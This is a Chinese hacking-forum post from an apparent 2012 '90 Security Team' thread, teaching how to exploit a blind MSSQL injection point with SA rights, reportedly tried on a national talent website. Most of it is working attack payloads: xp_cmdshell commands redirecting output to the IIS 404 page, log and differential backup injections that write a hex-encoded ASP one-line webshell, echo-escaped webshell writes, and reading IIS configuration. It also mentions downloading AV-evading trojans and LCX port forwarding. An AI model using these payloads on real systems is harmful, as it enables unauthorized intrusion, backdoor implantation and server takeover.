找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2111|回复: 0
打印 上一主题 下一主题

sa权限的教程.

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-15 14:30:15 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
————————————————————————九零后安全技术小组 | 90 Security  Team -- 打造90后网安精英团队  ———————————————————————————————
, H" E6 g* g9 R5 ~4 I3 [4 T3 L- ~4 f. h+ M6 G0 d! I
. Z8 k& O! f% l0 x
                                                             欢迎高手访问指导,欢迎新手朋友交流学习。
% l# B# [6 `6 c8 Z
: t( w% B- o6 f0 {4 V                                                                 
) q& z5 ~5 F" n3 N2 F- ~- m                                                                 
# k2 K1 {% o1 b9 B2 L" O                                                                  论坛: http://www.90team.net/
8 S) P( m0 {& B$ X
+ k) p! {, [) \$ U8 U6 s  [# P3 ]# P( r- l

) G  l3 M: f9 {) C友情检测国家人才网
( _' a, m# ], N; c: F
# q  P* Y+ ^) f/ p' [9 E8 ~+ B" W  P7 J3 p
内容:MSSQL注入SA权限不显错模式下的入侵; i3 s, |; e* D6 ?

7 ]2 H8 l$ F  @2 ]6 c
/ j$ w* P# w# p) S/ X一般新手扫到不显错的SA(systemadmin)的注入点时,虽然工具能猜表列目录但还是很麻烦有的人就直接放弃了,今天我给大家演示下如何利用。方法很简单大家看操作。8 U, k$ O0 p2 |# ?

: I6 y, p  n0 O! _& Q我这里使用的是 火狐的插件提交参数。跟在浏览器里直接提交一样。- _7 Z; A8 u5 u- z7 X' K
! E% H; Q* ?1 C6 O+ _5 h& p# e1 d0 ^
2 R. u* z! ^' E3 B, \( y+ f
这里的主机环境:MSSQL+JSP 权限为不显错的SA,支持多行执行 xp_cmdshell存活 服务器处于内网,WEB和数据库在同一台服务器上。注意这里服务器操作系统是windows2003,IIS,404页面的默认路径是 C:\Windows\Help\iisHelp\common\404b.htm。
  X3 e3 y2 h) i9 k7 A4 L4 M! ^
4 }* ]; ]4 ^% w* g- L思路:  Q( ^- e8 J; I% F' B

; w, v6 k# N" I! v- X7 O. s$ m首先:5 `9 {. {5 V( @8 C4 a

/ J- X/ D0 ~: h9 r8 Y通过XP_CMDSHELL 执行命令再将执行结果指向IIS的404页面,然后访问WEB站点的一个不存在的目录得到命令执行结果,刺探服务器信息。, d5 |( l- J3 J' z! ~- F- t! Y( A  d
9 {  @. e* j( B7 q  V( i
1.日志备份获得Webshell' {0 m  O: A8 \; ~

2 }+ T  n7 R6 E% C( q2.数据库差异备份获得Webshell3 h+ {5 s% H5 Z! o6 N. D2 M

6 w- ]6 O- ~5 m- x+ M  h+ t: f# I4.直接下载免杀远控木马。
$ d7 q( K7 C) ^. L. Z( `+ x7 Z' }
3 o4 G0 L% p" K$ q4 l5.直接下载LCX将服务器端口转发出来; g! f( s/ @6 z% F! w* M
# }2 Q8 ?8 u, |% \8 T7 U! P# i: k
6.通过XP_CMDSHELL 执行命令读取iis配置文件(C:\Windows\system32\inetsrv\MetaBase.xml )分析查找WEB站点路径并在CMD下写入转义后的一句话获得WEBSHELL上传LCX将服务器转发出来。3 |4 Y# `; `& A, t# ]
2 b) j/ S) H( o4 }: M
/ w& J' F3 }1 y
+ n! c8 `: {; u4 ?5 l
在这里我就不浪费大家时间了,我已经测试过  日志备份和 数据库差异备份 都没有成功 我就不演示了。  直接下载免杀木马。。这个也不用演示了。 直接在注入点后写入一个 DOWN 的VBS脚本下载就行了,
. g! r$ u9 Q8 \# T$ F2 U
+ b, J2 C. s: `" z( u4 p我直接演示后面一个方法
# x  A: d2 a) ^3 b4 q& S. H1 x6 R6 a2 C  P# ^1 |# C$ \
" N: P& v, e+ ~; I" r2 u1 g
分析查找WEB站点路径并在CMD下写入转义后的一句话获得WEBSHELL   J! i% s' d) f3 Y  Q' j* q
$ c1 w5 Q% w9 d- ^: V

( B2 ]- @8 Y& S/ q
! ~2 h* I0 _% j2 ~! P& m1 a* `1 ]! z3 e5 [4 l* u# n; E
◆日志备份:3 d" Q  ^" M4 \

! E8 y: A5 e+ k( K8 r& q  @
7 z& d, B9 n3 E' M5 d5 k1. 进行初始备份
! o/ w* _! C/ ]5 a, `; Alter Database TestDB Set Recovery Full Drop Table ttt Create Table ttt (a image) Backup Log TestDB to disk = '<e:\wwwroot\m.asp>' With Init--
* P" R! D8 c9 @6 U
; x4 C1 }8 h, r. @$ w! f: k  W9 n2. 插入数据4 {- P7 T# u. [0 h2 w
;Insert Into ttt Values(0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E)--6 Y! l) M0 p; J4 i/ X

. e2 e5 b- e( q: R, g, |& d0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E   为 一句话木马 %><%eval(request(chr(97))):response.end%>
6 y) X7 J+ e( ~0 H: l0 ]4 Z  ( h7 \0 N1 F* }- @: ^' G) z
3. 备份并获得文件,删除临时表# b2 d* W! W; o; _7 j8 H4 k3 o, W
;Backup Log <数据库名> To Disk = '<e:\wwwroot\m.asp>';Drop Table ttt Alter Database TestDB Set Recovery SIMPLE--
( q0 f: y+ s5 B  A% R' Q( o' n* S5 {4 u5 v+ b$ h
  ^9 N, Q- m1 e1 h" R! w* y8 X

, g: Q' e, y7 V& J8 z◆数据库差异备份2 @! L$ t2 R+ d" n. H
; u5 e1 T2 s1 u! p) e" B. I+ q
(1. 进行差异备份准备工作
$ ~; S1 @9 r8 ?7 Z; X% ?0 E; E2 Q: |: Q* h0 P" _
;Declare @a Sysname;Set @a=db_name();Declare @file VarChar(400);Set @file=<0x633A5C746573742E617370>;Drop Table ttt Create Table ttt(c Image) Backup Database @a To Disk=@file--
7 L1 s* g# g8 \' k( k+ `6 A
0 M, b$ _9 p, ]% t上面的 0x633A5C746573742E617370  是 c:\test.asp 路径转换后的16进制编码
. i* v9 w1 M  E4 y# t4 M5 O$ x / h+ \: K4 W6 r1 ]4 d$ D8 c; h& ^
( j5 C9 L7 H2 p  U$ X- [
(2. 将数据写入到数据库
& l# V( D5 k, o0 k;Insert Into ttt Values(0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E)-- 7 j2 ^5 V1 u& c; P( D. Y

; n, }0 Y, J+ g1 O0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E   为 一句话木马 %><%eval(request(chr(97))):response.end%>7 z8 K# h6 \( B( B) e- }. A

: [- j2 ?. h/ d3 ]" n3. 备份数据库并清理临时文件$ i. C3 k/ l( Z$ c; q8 ^6 G
. ~5 }( b  W4 ?" u( ~& }! d7 M, Z
;Declare @b SysName;Set @b=db_name();Declare @file1 VarChar(400);Set @file1=<0x633A5C746573742E617370>;Backup Database @b To Disk=@file1 With Differential,Format;Drop Table ttt;--
$ B( S# I9 q& L. a
# [: T- d/ e+ b8 h% j3 d$ d0x633A5C746573742E617370  为 c:\test.asp  删除临时文件 - T& g% n& E( @3 U& |9 B
+ Y2 Y4 h) S8 k; ?

2 r) a) t# c( a" o  l( h9 c/ t3 q9 H
用^转义字符来写ASP(一句话木马)文件的方法:   1 }9 {! ~- C2 O+ s) v" y
* f: v' I8 ^1 C9 k; H
1.注入点后执行;exec master.dbo.xp_cmdshell 'echo ^<script language=VBScript runat=server^>execute request^("90"^)^</script^> >c:\mu.asp';--* j; Q. h: M8 r( i
) ~5 {& M- G% z% G3 |
2.CMD下执行 echo ^<%execute^(request^("l"^)^)%^> >c:\mu.asp 0 {. T$ ~' `! ]$ o, h, T
, M% b/ C( X7 _' e0 g/ D! x, J
读取IIS配置信息获取web路径4 X$ q+ v5 d% a7 ~. {

0 h( K& D) P7 r5 F8 v     
2 p8 u. N2 D6 D2 ]4 y     注入点后面执行   ;exec master..xp_cmdshell 'copy C:\Windows\system32\inetsrv\MetaBase.xml C:\Windows\Help\iisHelp\common\404b.htm'--
% q2 s7 M: e. l  t* S) `1 w' @3 `) W. l  v' J) x& _
执行命令# a7 w+ P7 }& q4 d
     
7 f$ o2 p  J5 o# i% U: U     注入点后面执行   ;exec master..xp_cmdshell 'ver >C:\Windows\Help\iisHelp\common\404b.htm'--
6 T+ Y1 r0 _$ c, J- E7 [4 m* B- j% F8 ]/ V3 G& r
- k/ G5 o9 @5 z' p/ }% c
$ D% T, H* E2 [0 ~- B* [

" S8 x5 @* n& O0 k9 w% k1 P2 X7 ^) r1 G6 o2 `/ b

+ l" m1 i) k2 G; S$ E
  E7 s; a/ ~, `) [6 [
. O  T$ t% A4 O+ P
: V& ], d: T/ {; H
  h1 z- _- q) a5 |% ^7 `# k$ c# A; \9 _3 d6 @6 T. W. r6 ^
4 P( p  E& T9 k1 F+ P  m

; {: r6 H. ?* h2 l% n( D9 N, m& E& `! Y' z  y

3 v1 q/ J- d; S: g2 |# o8 Z1 \9 j  `  b7 N4 ?  y4 t) e% d

% }. ~9 Z: B7 Y+ m" T5 z1 J
  O5 Y  E: q. `7 K; e2 @" H5 C' q& c' e6 H

- h; a$ e" f" N- U
( K- O- y: \. A! c8 ]: w1 _& c4 q% c" Z# q* f: y- c2 h
! g- v# V. x# e* Z
  A' g! x. ~9 S- ?& w9 H  h7 N

9 S; c3 r" y+ g3 I) r5 \( h9 b# G( X8 S0 O

) ?5 \/ v2 X* G% [- e& O4 B. n; j+ R- l6 d

" E$ D, t5 _( U- C& K8 W. G# g6 u. ^$ s- ~, N( p& Z" Z

* O, N6 ~1 h6 w, L! `, m8 [) W" K4 P! L$ P1 Y+ K' \

8 n- B  V; Y+ |) g
: _' o. Z6 a" N  c
. q- g# q' f4 Y% n2 d' g: R
) v. Y1 G/ z8 P0 \9 n: L" U
. Z+ h3 a; D9 {- W9 i
; w2 c, Q0 e9 \6 l  \8 h& |0 w  e$ t. s+ ^, x1 O
+ p, S& G1 G7 v2 c

. H! r. l  i1 n  N8 {0 U2 F- g* N  G
3 ^2 K* o/ {8 ]  s+ @3 L7 A! I1 ^2 f. U
( o+ B$ m/ }$ l/ j
% ~* q5 x0 ?: J6 P, m. H. k+ ^& C- \+ A2 W7 u+ {2 ?* E  Z& t
, I6 J0 g3 _4 Q1 @6 R3 x2 o  ]

9 L$ A1 M8 k$ {  k1 a# y* f- g( ]4 E6 |8 c3 M
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表